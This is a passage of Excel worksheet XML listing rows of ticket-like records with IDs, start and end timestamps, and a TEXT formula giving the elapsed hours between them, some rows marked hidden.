      <c r="G117" t="s">
        <v>189</v>
      </c>
      <c r="H117" t="str">
        <f>TEXT(F117-E117,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="118" spans="1:8">
      <c r="A118" t="s">
        <v>1084</v>
      </c>
      <c r="B118">
        <v>14457</v>
      </c>
      <c r="C118" t="s">
        <v>1085</v>
      </c>
      <c r="D118" t="s">
        <v>7</v>
      </c>
      <c r="E118" s="1">
        <v>43716.991342592592</v>
      </c>
      <c r="F118" s="1">
        <v>43717.163287037038</v>
      </c>
      <c r="G118" t="s">
        <v>1086</v>
      </c>
      <c r="H118" t="str">
        <f>TEXT(F118-E118,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="119" spans="1:8" hidden="1">
      <c r="A119" t="s">
        <v>1087</v>
      </c>
      <c r="B119">
        <v>14456</v>
      </c>
      <c r="C119" t="s">
        <v>1088</v>
      </c>
      <c r="D119" t="s">
        <v>7</v>
      </c>
      <c r="E119" s="1">
        <v>43716.813125000001</v>
      </c>
      <c r="F119" s="1">
        <v>43716.968368055554</v>
      </c>
      <c r="G119" t="s">
        <v>1089</v>
      </c>
      <c r="H119" t="str">
        <f>TEXT(F119-E119,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="120" spans="1:8" hidden="1">
      <c r="A120" t="s">
        <v>1090</v>
      </c>
      <c r="B120">
        <v>14454</v>
      </c>
      <c r="C120" t="s">
        <v>1091</v>
      </c>
      <c r="D120" t="s">
        <v>7</v>
      </c>
      <c r="E120" s="1">
        <v>43716.332557870373</v>
      </c>
      <c r="F120" s="1">
        <v>43728.251122685186</v>
      </c>
      <c r="G120" t="s">
        <v>1092</v>
      </c>
      <c r="H120" t="str">
        <f>TEXT(F120-E120,"[h]")</f>
        <v>286</v>
      </c>
    </row>
    <row r="121" spans="1:8" hidden="1">
      <c r="A121" t="s">
        <v>1093</v>
      </c>
      <c r="B121">
        <v>14453</v>
      </c>
      <c r="C121" t="s">
        <v>1094</v>
      </c>
      <c r="D121" t="s">
        <v>7</v>
      </c>
      <c r="E121" s="1">
        <v>43716.228865740741</v>
      </c>
      <c r="F121" s="1">
        <v>43716.807291666664</v>
      </c>
      <c r="G121" t="s">
        <v>1095</v>
      </c>
      <c r="H121" t="str">
        <f>TEXT(F121-E121,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="122" spans="1:8" hidden="1">
      <c r="A122" t="s">
        <v>1096</v>
      </c>
      <c r="B122">
        <v>14452</v>
      </c>
      <c r="C122" t="s">
        <v>1097</v>
      </c>
      <c r="D122" t="s">
        <v>7</v>
      </c>
      <c r="E122" s="1">
        <v>43715.914317129631</v>
      </c>
      <c r="F122" s="1">
        <v>43716.337268518517</v>
      </c>
      <c r="G122" t="s">
        <v>1098</v>
      </c>
      <c r="H122" t="str">
        <f>TEXT(F122-E122,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="123" spans="1:8">
      <c r="A123" t="s">
        <v>1099</v>
      </c>
      <c r="B123">
        <v>14449</v>
      </c>
      <c r="C123" t="s">
        <v>1100</v>
      </c>
      <c r="D123" t="s">
        <v>7</v>
      </c>
      <c r="E123" s="1">
        <v>43715.108703703707</v>
      </c>
      <c r="F123" s="1">
        <v>43715.850486111114</v>
      </c>
      <c r="G123" t="s">
        <v>123</v>
      </c>
      <c r="H123" t="str">
        <f>TEXT(F123-E123,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="124" spans="1:8" hidden="1">
      <c r="A124" t="s">
        <v>1101</v>
      </c>
      <c r="B124">
        <v>14448</v>
      </c>
      <c r="C124" t="s">
        <v>1102</v>
      </c>
      <c r="D124" t="s">
        <v>7</v>
      </c>
      <c r="E124" s="1">
        <v>43715.037962962961</v>
      </c>
      <c r="F124" s="1">
        <v>43715.253275462965</v>
      </c>
      <c r="G124" t="s">
        <v>1103</v>
      </c>
      <c r="H124" t="str">
        <f>TEXT(F124-E124,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="125" spans="1:8" hidden="1">
      <c r="A125" t="s">
        <v>1104</v>
      </c>
      <c r="B125">
        <v>14447</v>
      </c>
      <c r="C125" t="s">
        <v>1105</v>
      </c>
      <c r="D125" t="s">
        <v>7</v>
      </c>
      <c r="E125" s="1">
        <v>43715.01185185185</v>
      </c>
      <c r="F125" s="1">
        <v>43741.273680555554</v>
      </c>
      <c r="G125" t="s">
        <v>998</v>
      </c>
      <c r="H125" t="str">
        <f>TEXT(F125-E125,"[h]")</f>
        <v>630</v>
      </c>
    </row>
    <row r="126" spans="1:8" hidden="1">
      <c r="A126" t="s">
        <v>1106</v>
      </c>
      <c r="B126">
        <v>14446</v>
      </c>
      <c r="C126" t="s">
        <v>1107</v>
      </c>
      <c r="D126" t="s">
        <v>7</v>
      </c>
      <c r="E126" s="1">
        <v>43714.831041666665</v>
      </c>
      <c r="F126" s="1">
        <v>43714.890972222223</v>
      </c>
      <c r="G126" t="s">
        <v>859</v>
      </c>
      <c r="H126" t="str">
        <f>TEXT(F126-E126,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="127" spans="1:8" hidden="1">
      <c r="A127" t="s">
        <v>1108</v>
      </c>
      <c r="B127">
        <v>14444</v>
      </c>
      <c r="C127" t="s">
        <v>1109</v>
      </c>
      <c r="D127" t="s">
        <v>7</v>
      </c>
      <c r="E127" s="1">
        <v>43714.768009259256</v>
      </c>
      <c r="F127" s="1">
        <v>43714.935798611114</v>
      </c>
      <c r="G127" t="s">
        <v>831</v>
      </c>
      <c r="H127" t="str">
        <f>TEXT(F127-E127,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="128" spans="1:8">
      <c r="A128" t="s">
        <v>1110</v>
      </c>
      <c r="B128">
        <v>14439</v>
      </c>
      <c r="C128" t="s">
        <v>1111</v>
      </c>
      <c r="D128" t="s">
        <v>7</v>
      </c>
      <c r="E128" s="1">
        <v>43714.488043981481</v>
      </c>
      <c r="F128" s="1">
        <v>43720.89539351852</v>
      </c>
      <c r="G128" t="s">
        <v>1068</v>
      </c>
      <c r="H128" t="str">
        <f>TEXT(F128-E128,"[h]")</f>
        <v>153</v>
      </c>
    </row>
    <row r="129" spans="1:8">
      <c r="A129" t="s">
        <v>1112</v>
      </c>
      <c r="B129">
        <v>14436</v>
      </c>
      <c r="C129" t="s">
        <v>1113</v>
      </c>
      <c r="D129" t="s">
        <v>7</v>
      </c>
      <c r="E129" s="1">
        <v>43714.014722222222</v>
      </c>
      <c r="F129" s="1">
        <v>43714.066759259258</v>
      </c>
      <c r="G129" t="s">
        <v>1114</v>
      </c>
      <c r="H129" t="str">
        <f>TEXT(F129-E129,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="130" spans="1:8">
      <c r="A130" t="s">
        <v>1115</v>
      </c>
      <c r="B130">
        <v>14434</v>
      </c>
      <c r="C130" t="s">
        <v>1116</v>
      </c>
      <c r="D130" t="s">
        <v>7</v>
      </c>
      <c r="E130" s="1">
        <v>43713.865879629629</v>
      </c>
      <c r="F130" s="1">
        <v>43713.912453703706</v>
      </c>
      <c r="G130" t="s">
        <v>1117</v>
      </c>
      <c r="H130" t="str">
        <f>TEXT(F130-E130,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="131" spans="1:8">
      <c r="A131" t="s">
        <v>1121</v>
      </c>
      <c r="B131">
        <v>14432</v>
      </c>
      <c r="C131" t="s">
        <v>1122</v>
      </c>
      <c r="D131" t="s">
        <v>7</v>
      </c>
      <c r="E131" s="1">
        <v>43713.813923611109</v>
      </c>
      <c r="F131" s="1">
        <v>43713.863206018519</v>
      </c>
      <c r="G131" t="s">
        <v>1117</v>
      </c>
      <c r="H131" t="str">
        <f>TEXT(F131-E131,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="132" spans="1:8">
      <c r="A132" t="s">
        <v>1118</v>
      </c>
      <c r="B132">
        <v>14431</v>
      </c>
      <c r="C132" t="s">
        <v>1119</v>
      </c>
      <c r="D132" t="s">
        <v>7</v>
      </c>
      <c r="E132" s="1">
        <v>43713.808055555557</v>
      </c>
      <c r="F132" s="1">
        <v>43713.843159722222</v>
      </c>
      <c r="G132" t="s">
        <v>1120</v>
      </c>
      <c r="H132" t="str">
        <f>TEXT(F132-E132,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="133" spans="1:8">
      <c r="A133" t="s">
        <v>1123</v>
      </c>
      <c r="B133">
        <v>14429</v>
      </c>
      <c r="C133" t="s">
        <v>1124</v>
      </c>
      <c r="D133" t="s">
        <v>7</v>
      </c>
      <c r="E133" s="1">
        <v>43713.59578703704</v>
      </c>
      <c r="F133" s="1">
        <v>43713.785069444442</v>
      </c>
      <c r="G133" t="s">
        <v>16</v>
      </c>
      <c r="H133" t="str">
        <f>TEXT(F133-E133,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="134" spans="1:8" hidden="1">
      <c r="A134" t="s">
        <v>1125</v>
      </c>
      <c r="B134">
        <v>14426</v>
      </c>
      <c r="C134" t="s">
        <v>1126</v>
      </c>
      <c r="D134" t="s">
        <v>7</v>
      </c>
      <c r="E134" s="1">
        <v>43713.392800925925</v>
      </c>
      <c r="F134" s="1">
        <v>43714.271863425929</v>
      </c>
      <c r="G134" t="s">
        <v>255</v>
      </c>
      <c r="H134" t="str">
        <f>TEXT(F134-E134,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="135" spans="1:8">
      <c r="A135" t="s">
        <v>1127</v>
      </c>
      <c r="B135">
        <v>14423</v>
      </c>
      <c r="C135" t="s">
        <v>1128</v>
      </c>
      <c r="D135" t="s">
        <v>7</v>
      </c>
      <c r="E135" s="1">
        <v>43712.992638888885</v>
      </c>
      <c r="F135" s="1">
        <v>43713.054710648146</v>
      </c>
      <c r="G135" t="s">
        <v>1129</v>
      </c>
      <c r="H135" t="str">
        <f>TEXT(F135-E135,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="136" spans="1:8">
      <c r="A136" t="s">
        <v>1135</v>
      </c>
      <c r="B136">
        <v>14417</v>
      </c>
      <c r="C136" t="s">
        <v>1136</v>
      </c>
      <c r="D136" t="s">
        <v>7</v>
      </c>
      <c r="E136" s="1">
        <v>43712.352025462962</v>
      </c>
      <c r="F136" s="1">
        <v>43712.661481481482</v>
      </c>
      <c r="G136" t="s">
        <v>19</v>
      </c>
      <c r="H136" t="str">
        <f>TEXT(F136-E136,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="137" spans="1:8">
      <c r="A137" t="s">
        <v>1137</v>
      </c>
      <c r="B137">
        <v>14416</v>
      </c>
      <c r="C137" t="s">
        <v>1138</v>
      </c>
      <c r="D137" t="s">
        <v>7</v>
      </c>
      <c r="E137" s="1">
        <v>43712.232048611113</v>
      </c>
      <c r="F137" s="1">
        <v>43712.359918981485</v>
      </c>
      <c r="G137" t="s">
        <v>25</v>
      </c>
      <c r="H137" t="str">
        <f>TEXT(F137-E137,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="138" spans="1:8">
      <c r="A138" t="s">
        <v>1139</v>
      </c>
      <c r="B138">
        <v>14413</v>
      </c>
      <c r="C138" t="s">
        <v>1140</v>
      </c>
      <c r="D138" t="s">
        <v>7</v>
      </c>
      <c r="E138" s="1">
        <v>43711.339768518519</v>
      </c>
      <c r="F138" s="1">
        <v>43712.661481481482</v>
      </c>
      <c r="G138" t="s">
        <v>19</v>
      </c>
      <c r="H138" t="str">
        <f>TEXT(F138-E138,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="139" spans="1:8" hidden="1">
      <c r="A139" t="s">
        <v>1141</v>
      </c>
      <c r="B139">
        <v>14411</v>
      </c>
      <c r="C139" t="s">
        <v>1142</v>
      </c>
      <c r="D139" t="s">
        <v>7</v>
      </c>
      <c r="E139" s="1">
        <v>43710.636956018519</v>
      </c>
      <c r="F139" s="1">
        <v>43711.659409722219</v>
      </c>
      <c r="G139" t="s">
        <v>1143</v>
      </c>
      <c r="H139" t="str">
        <f>TEXT(F139-E139,"[h]")</f>
        <v>24</v>
      </c>
    </row>
    <row r="140" spans="1:8" hidden="1">
      <c r="A140" t="s">
        <v>1144</v>
      </c>
      <c r="B140">
        <v>14410</v>
      </c>
      <c r="C140" t="s">
        <v>1145</v>
      </c>
      <c r="D140" t="s">
        <v>7</v>
      </c>
      <c r="E140" s="1">
        <v>43710.612442129626</v>
      </c>
      <c r="F140" s="1">
        <v>43716.708032407405</v>
      </c>
      <c r="G140" t="s">
        <v>1146</v>
      </c>
      <c r="H140" t="str">
        <f>TEXT(F140-E140,"[h]")</f>
        <v>146</v>
      </c>
    </row>
    <row r="141" spans="1:8" hidden="1">
      <c r="A141" t="s">
        <v>1147</v>
      </c>
      <c r="B141">
        <v>14409</v>
      </c>
      <c r="C141" t="s">
        <v>1148</v>
      </c>
      <c r="D141" t="s">
        <v>7</v>
      </c>
      <c r="E141" s="1">
        <v>43710.128564814811</v>
      </c>
      <c r="F141" s="1">
        <v>43721.074189814812</v>
      </c>
      <c r="G141" t="s">
        <v>1149</v>
      </c>
      <c r="H141" t="str">
        <f>TEXT(F141-E141,"[h]")</f>
        <v>262</v>
      </c>
    </row>
    <row r="142" spans="1:8" hidden="1">
      <c r="A142" t="s">
        <v>1150</v>
      </c>
      <c r="B142">
        <v>14408</v>
      </c>
      <c r="C142" t="s">
        <v>1151</v>
      </c>
      <c r="D142" t="s">
        <v>7</v>
      </c>
      <c r="E142" s="1">
        <v>43709.673368055555</v>
      </c>
      <c r="F142" s="1">
        <v>43709.716597222221</v>
      </c>
      <c r="G142" t="s">
        <v>1143</v>
      </c>
      <c r="H142" t="str">
        <f>TEXT(F142-E142,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="143" spans="1:8" hidden="1">
      <c r="A143" t="s">
        <v>1152</v>
      </c>
      <c r="B143">
        <v>14406</v>
      </c>
      <c r="C143" t="s">
        <v>1153</v>
      </c>
      <c r="D143" t="s">
        <v>7</v>
      </c>
      <c r="E143" s="1">
        <v>43709.507673611108</v>
      </c>
      <c r="F143" s="1">
        <v>43711.599479166667</v>
      </c>
      <c r="G143" t="s">
        <v>251</v>
      </c>
      <c r="H143" t="str">
        <f>TEXT(F143-E143,"[h]")</f>
        <v>50</v>
      </c>
    </row>
    <row r="144" spans="1:8" hidden="1">
      <c r="A144" t="s">
        <v>1154</v>
      </c>
      <c r="B144">
        <v>14404</v>
      </c>
      <c r="C144" t="s">
        <v>1155</v>
      </c>
      <c r="D144" t="s">
        <v>7</v>
      </c>
      <c r="E144" s="1">
        <v>43708.893865740742</v>
      </c>
      <c r="F144" s="1">
        <v>43709.693518518521</v>
      </c>
      <c r="G144" t="s">
        <v>1156</v>
      </c>
      <c r="H144" t="str">
        <f>TEXT(F144-E144,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="145" spans="1:8" hidden="1">
      <c r="A145" t="s">
        <v>1157</v>
      </c>
      <c r="B145">
        <v>14403</v>
      </c>
      <c r="C145" t="s">
        <v>1158</v>
      </c>
      <c r="D145" t="s">
        <v>7</v>
      </c>
      <c r="E145" s="1">
        <v>43708.440925925926</v>
      </c>
      <c r="F145" s="1">
        <v>43716.807280092595</v>
      </c>
      <c r="G145" t="s">
        <v>1159</v>
      </c>
      <c r="H145" t="str">
        <f>TEXT(F145-E145,"[h]")</f>
        <v>200</v>
      </c>
    </row>
    <row r="146" spans="1:8" hidden="1">
      <c r="A146" t="s">
        <v>1160</v>
      </c>
      <c r="B146">
        <v>14399</v>
      </c>
      <c r="C146" t="s">
        <v>1161</v>
      </c>
      <c r="D146" t="s">
        <v>7</v>
      </c>
      <c r="E146" s="1">
        <v>43707.251006944447</v>
      </c>
      <c r="F146" s="1">
        <v>43717.936342592591</v>
      </c>
      <c r="G146" t="s">
        <v>831</v>
      </c>
      <c r="H146" t="str">
        <f>TEXT(F146-E146,"[h]")</f>
        <v>256</v>
      </c>
    </row>
    <row r="147" spans="1:8" hidden="1">
      <c r="A147" t="s">
        <v>1162</v>
      </c>
      <c r="B147">
        <v>14395</v>
      </c>
      <c r="C147" t="s">
        <v>1163</v>
      </c>
      <c r="D147" t="s">
        <v>7</v>
      </c>
      <c r="E147" s="1">
        <v>43705.990046296298</v>
      </c>
      <c r="F147" s="1">
        <v>43712.884479166663</v>
      </c>
      <c r="G147" t="s">
        <v>51</v>
      </c>
      <c r="H147" t="str">
        <f>TEXT(F147-E147,"[h]")</f>
        <v>165</v>
      </c>
    </row>
    <row r="148" spans="1:8">
      <c r="A148" t="s">
        <v>1164</v>
      </c>
      <c r="B148">
        <v>14393</v>
      </c>
      <c r="C148" t="s">
        <v>1165</v>
      </c>
      <c r="D148" t="s">
        <v>7</v>
      </c>
      <c r="E148" s="1">
        <v>43705.705347222225</v>
      </c>
      <c r="F148" s="1">
        <v>43716.62908564815</v>
      </c>
      <c r="G148" t="s">
        <v>16</v>
      </c>
      <c r="H148" t="str">
        <f>TEXT(F148-E148,"[h]")</f>
        <v>262</v>
      </c>
    </row>
    <row r="149" spans="1:8" hidden="1">
      <c r="A149" t="s">
        <v>1166</v>
      </c>
      <c r="B149">
        <v>14392</v>
      </c>
      <c r="C149" t="s">
        <v>1167</v>
      </c>
      <c r="D149" t="s">
        <v>7</v>
      </c>
      <c r="E149" s="1">
        <v>43705.662916666668</v>
      </c>
      <c r="F149" s="1">
        <v>43709.317835648151</v>
      </c>
      <c r="G149" t="s">
        <v>255</v>
      </c>
      <c r="H149" t="str">
        <f>TEXT(F149-E149,"[h]")</f>
        <v>87</v>
      </c>
    </row>
    <row r="150" spans="1:8" hidden="1">
      <c r="A150" t="s">
        <v>1168</v>
      </c>
      <c r="B150">
        <v>14390</v>
      </c>
      <c r="C150" t="s">
        <v>1169</v>
      </c>
      <c r="D150" t="s">
        <v>7</v>
      </c>
      <c r="E150" s="1">
        <v>43705.423009259262</v>
      </c>
      <c r="F150" s="1">
        <v>43705.54965277778</v>
      </c>
      <c r="G150" t="s">
        <v>1103</v>
      </c>
      <c r="H150" t="str">
        <f>TEXT(F150-E150,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="151" spans="1:8" hidden="1">
      <c r="A151" t="s">
        <v>1170</v>
      </c>
      <c r="B151">
        <v>14389</v>
      </c>
      <c r="C151" t="s">
        <v>1171</v>
      </c>
      <c r="D151" t="s">
        <v>7</v>
      </c>
      <c r="E151" s="1">
        <v>43705.342627314814</v>
      </c>
      <c r="F151" s="1">
        <v>43756.850034722222</v>
      </c>
      <c r="G151" t="s">
        <v>831</v>
      </c>
      <c r="H151" t="str">
        <f>TEXT(F151-E151,"[h]")</f>
        <v>1236</v>
      </c>
    </row>
    <row r="152" spans="1:8">
      <c r="A152" t="s">
        <v>1130</v>
      </c>
      <c r="B152">
        <v>14387</v>
      </c>
      <c r="C152" t="s">
        <v>1131</v>
      </c>
      <c r="D152" t="s">
        <v>7</v>
      </c>
      <c r="E152" s="1">
        <v>43705.294027777774</v>
      </c>
      <c r="F152" s="1">
        <v>43712.893576388888</v>
      </c>
      <c r="G152" t="s">
        <v>1132</v>
      </c>
      <c r="H152" t="str">
        <f>TEXT(F152-E152,"[h]")</f>
        <v>182</v>
      </c>
    </row>
    <row r="153" spans="1:8" hidden="1">
      <c r="A153" t="s">
        <v>1172</v>
      </c>
      <c r="B153">
        <v>14386</v>
      </c>
      <c r="C153" t="s">
        <v>1173</v>
      </c>
      <c r="D153" t="s">
        <v>7</v>
      </c>
      <c r="E153" s="1">
        <v>43705.258981481478</v>
      </c>
      <c r="F153" s="1">
        <v>43712.884479166663</v>
      </c>
      <c r="G153" t="s">
        <v>66</v>
      </c>
      <c r="H153" t="str">
        <f>TEXT(F153-E153,"[h]")</f>
        <v>183</v>
      </c>
    </row>
    <row r="154" spans="1:8" hidden="1">
      <c r="A154" t="s">
        <v>1174</v>
      </c>
      <c r="B154">
        <v>14385</v>
      </c>
      <c r="C154" t="s">
        <v>1175</v>
      </c>
      <c r="D154" t="s">
        <v>7</v>
      </c>
      <c r="E154" s="1">
        <v>43705.142997685187</v>
      </c>
      <c r="F154" s="1">
        <v>43706.948078703703</v>
      </c>
      <c r="G154" t="s">
        <v>1103</v>
      </c>
      <c r="H154" t="str">
        <f>TEXT(F154-E154,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="155" spans="1:8" hidden="1">
      <c r="A155" t="s">
        <v>1176</v>
      </c>
      <c r="B155">
        <v>14382</v>
      </c>
      <c r="C155" t="s">
        <v>1177</v>
      </c>
      <c r="D155" t="s">
        <v>7</v>
      </c>
      <c r="E155" s="1">
        <v>43704.844282407408</v>
      </c>
      <c r="F155" s="1">
        <v>43704.879143518519</v>
      </c>
      <c r="G155" t="s">
        <v>859</v>
      </c>
      <c r="H155" t="str">
        <f>TEXT(F155-E155,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="156" spans="1:8">
      <c r="A156" t="s">
        <v>1178</v>
      </c>
      <c r="B156">
        <v>14381</v>
      </c>
      <c r="C156" t="s">
        <v>1179</v>
      </c>
      <c r="D156" t="s">
        <v>7</v>
      </c>
      <c r="E156" s="1">
        <v>43704.80400462963</v>
      </c>
      <c r="F156" s="1">
        <v>43753.968668981484</v>
      </c>
      <c r="G156" t="s">
        <v>1180</v>
      </c>
      <c r="H156" t="str">
        <f>TEXT(F156-E156,"[h]")</f>
        <v>1179</v>
      </c>
    </row>
    <row r="157" spans="1:8">
      <c r="A157" t="s">
        <v>1181</v>
      </c>
      <c r="B157">
        <v>14379</v>
      </c>
      <c r="C157" t="s">
        <v>1182</v>
      </c>
      <c r="D157" t="s">
        <v>7</v>
      </c>
      <c r="E157" s="1">
        <v>43704.599340277775</v>
      </c>
      <c r="F157" s="1">
        <v>43753.968657407408</v>
      </c>
      <c r="G157" t="s">
        <v>31</v>
      </c>
      <c r="H157" t="str">
        <f>TEXT(F157-E157,"[h]")</f>
        <v>1184</v>
      </c>
    </row>
    <row r="158" spans="1:8" hidden="1">
      <c r="A158" t="s">
        <v>1183</v>
      </c>
      <c r="B158">
        <v>14378</v>
      </c>
      <c r="C158" t="s">
        <v>1184</v>
      </c>
      <c r="D158" t="s">
        <v>7</v>
      </c>
      <c r="E158" s="1">
        <v>43704.572789351849</v>
      </c>
      <c r="F158" s="1">
        <v>43709.594942129632</v>
      </c>
      <c r="G158" t="s">
        <v>1185</v>
      </c>
      <c r="H158" t="str">
        <f>TEXT(F158-E158,"[h]")</f>
        <v>120</v>
      </c>
    </row>
    <row r="159" spans="1:8">
      <c r="A159" t="s">
        <v>1186</v>
      </c>
      <c r="B159">
        <v>14373</v>
      </c>
      <c r="C159" t="s">
        <v>1187</v>
      </c>
      <c r="D159" t="s">
        <v>7</v>
      </c>
      <c r="E159" s="1">
        <v>43704.295208333337</v>
      </c>
      <c r="F159" s="1">
        <v>43705.422326388885</v>
      </c>
      <c r="G159" t="s">
        <v>25</v>
      </c>
      <c r="H159" t="str">
        <f>TEXT(F159-E159,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="160" spans="1:8" hidden="1">
      <c r="A160" t="s">
        <v>1188</v>
      </c>
      <c r="B160">
        <v>14369</v>
      </c>
      <c r="C160" t="s">
        <v>1189</v>
      </c>
      <c r="D160" t="s">
        <v>7</v>
      </c>
      <c r="E160" s="1">
        <v>43704.069849537038</v>
      </c>
      <c r="F160" s="1">
        <v>43704.354849537034</v>
      </c>
      <c r="G160" t="s">
        <v>445</v>
      </c>
      <c r="H160" t="str">
        <f>TEXT(F160-E160,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="161" spans="1:8" hidden="1">
      <c r="A161" t="s">
        <v>1190</v>
      </c>
      <c r="B161">
        <v>14368</v>
      </c>
      <c r="C161" t="s">
        <v>1191</v>
      </c>
      <c r="D161" t="s">
        <v>7</v>
      </c>
      <c r="E161" s="1">
        <v>43704.031863425924</v>
      </c>
      <c r="F161" s="1">
        <v>43753.69740740741</v>
      </c>
      <c r="G161" t="s">
        <v>28</v>
      </c>
      <c r="H161" t="str">
        <f>TEXT(F161-E161,"[h]")</f>
        <v>1191</v>
      </c>
    </row>
    <row r="162" spans="1:8" hidden="1">
      <c r="A162" t="s">
        <v>1192</v>
      </c>
      <c r="B162">
        <v>14365</v>
      </c>
      <c r="C162" t="s">
        <v>1193</v>
      </c>
      <c r="D162" t="s">
        <v>7</v>
      </c>
      <c r="E162" s="1">
        <v>43703.782465277778</v>
      </c>
      <c r="F162" s="1">
        <v>43704.346932870372</v>
      </c>
      <c r="G162" t="s">
        <v>75</v>
      </c>
      <c r="H162" t="str">
        <f>TEXT(F162-E162,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="163" spans="1:8" hidden="1">
      <c r="A163" t="s">
        <v>1194</v>
      </c>
      <c r="B163">
        <v>14364</v>
      </c>
      <c r="C163" t="s">
        <v>1195</v>
      </c>
      <c r="D163" t="s">
        <v>7</v>
      </c>
      <c r="E163" s="1">
        <v>43703.695335648146</v>
      </c>
      <c r="F163" s="1">
        <v>43705.988749999997</v>
      </c>
      <c r="G163" t="s">
        <v>174</v>
      </c>
      <c r="H163" t="str">
        <f>TEXT(F163-E163,"[h]")</f>
        <v>55</v>
      </c>
    </row>
    <row r="164" spans="1:8" hidden="1">
      <c r="A164" t="s">
        <v>1024</v>
      </c>
      <c r="B164">
        <v>14360</v>
      </c>
      <c r="C164" t="s">
        <v>1025</v>
      </c>
      <c r="D164" t="s">
        <v>7</v>
      </c>
      <c r="E164" s="1">
        <v>43702.856157407405</v>
      </c>
      <c r="F164" s="1">
        <v>43715.706134259257</v>
      </c>
      <c r="G164" t="s">
        <v>1026</v>
      </c>
      <c r="H164" t="str">
        <f>TEXT(F164-E164,"[h]")</f>
        <v>308</v>
      </c>
    </row>
    <row r="165" spans="1:8" hidden="1">
      <c r="A165" t="s">
        <v>1196</v>
      </c>
      <c r="B165">
        <v>14356</v>
      </c>
      <c r="C165" t="s">
        <v>1197</v>
      </c>
      <c r="D165" t="s">
        <v>7</v>
      </c>
      <c r="E165" s="1">
        <v>43702.36215277778</v>
      </c>
      <c r="F165" s="1">
        <v>43733.785462962966</v>
      </c>
      <c r="G165" t="s">
        <v>90</v>
      </c>
      <c r="H165" t="str">
        <f>TEXT(F165-E165,"[h]")</f>
        <v>754</v>
      </c>
    </row>
    <row r="166" spans="1:8" hidden="1">
      <c r="A166" t="s">
        <v>1198</v>
      </c>
      <c r="B166">
        <v>14355</v>
      </c>
      <c r="C166" t="s">
        <v>1199</v>
      </c>
      <c r="D166" t="s">
        <v>7</v>
      </c>
      <c r="E166" s="1">
        <v>43702.137604166666</v>
      </c>
      <c r="F166" s="1">
        <v>43715.704594907409</v>
      </c>
      <c r="G166" t="s">
        <v>66</v>
      </c>
      <c r="H166" t="str">
        <f>TEXT(F166-E166,"[h]")</f>
        <v>325</v>
      </c>
    </row>
    <row r="167" spans="1:8" hidden="1">
      <c r="A167" t="s">
        <v>1200</v>
      </c>
      <c r="B167">
        <v>14354</v>
      </c>
      <c r="C167" t="s">
        <v>1201</v>
      </c>
      <c r="D167" t="s">
        <v>7</v>
      </c>
      <c r="E167" s="1">
        <v>43702.084456018521</v>
      </c>
      <c r="F167" s="1">
        <v>43731.461111111108</v>
      </c>
      <c r="G167" t="s">
        <v>1202</v>
      </c>
      <c r="H167" t="str">
        <f>TEXT(F167-E167,"[h]")</f>
        <v>705</v>
      </c>
    </row>
    <row r="168" spans="1:8" hidden="1">
      <c r="A168" t="s">
        <v>1203</v>
      </c>
      <c r="B168">
        <v>14353</v>
      </c>
      <c r="C168" t="s">
        <v>1204</v>
      </c>
      <c r="D168" t="s">
        <v>7</v>
      </c>
      <c r="E168" s="1">
        <v>43701.910439814812</v>
      </c>
      <c r="F168" s="1">
        <v>43762.013101851851</v>
      </c>
      <c r="G168" t="s">
        <v>1205</v>
      </c>
      <c r="H168" t="str">
        <f>TEXT(F168-E168,"[h]")</f>
        <v>1442</v>
      </c>
    </row>
    <row r="169" spans="1:8" hidden="1">
      <c r="A169" t="s">
        <v>1206</v>
      </c>
      <c r="B169">
        <v>14352</v>
      </c>
      <c r="C169" t="s">
        <v>1207</v>
      </c>
      <c r="D169" t="s">
        <v>7</v>
      </c>
      <c r="E169" s="1">
        <v>43701.822997685187</v>
      </c>
      <c r="F169" s="1">
        <v>43712.354756944442</v>
      </c>
      <c r="G169" t="s">
        <v>1205</v>
      </c>
      <c r="H169" t="str">
        <f>TEXT(F169-E169,"[h]")</f>
        <v>252</v>
      </c>
    </row>
    <row r="170" spans="1:8" hidden="1">
      <c r="A170" t="s">
        <v>1133</v>
      </c>
      <c r="B170">
        <v>14351</v>
      </c>
      <c r="C170" t="s">
        <v>1134</v>
      </c>
      <c r="D170" t="s">
        <v>7</v>
      </c>
      <c r="E170" s="1">
        <v>43701.756736111114</v>
      </c>
      <c r="F170" s="1">
        <v>43701.794502314813</v>
      </c>
      <c r="G170" t="s">
        <v>66</v>
      </c>
      <c r="H170" t="str">
        <f>TEXT(F170-E170,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="171" spans="1:8" hidden="1">
      <c r="A171" t="s">
        <v>1208</v>
      </c>
      <c r="B171">
        <v>14350</v>
      </c>
      <c r="C171" t="s">
        <v>1209</v>
      </c>
      <c r="D171" t="s">
        <v>7</v>
      </c>
      <c r="E171" s="1">
        <v>43701.648854166669</v>
      </c>
      <c r="F171" s="1">
        <v>43701.691261574073</v>
      </c>
      <c r="G171" t="s">
        <v>552</v>
      </c>
      <c r="H171" t="str">
        <f>TEXT(F171-E171,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="172" spans="1:8" hidden="1">
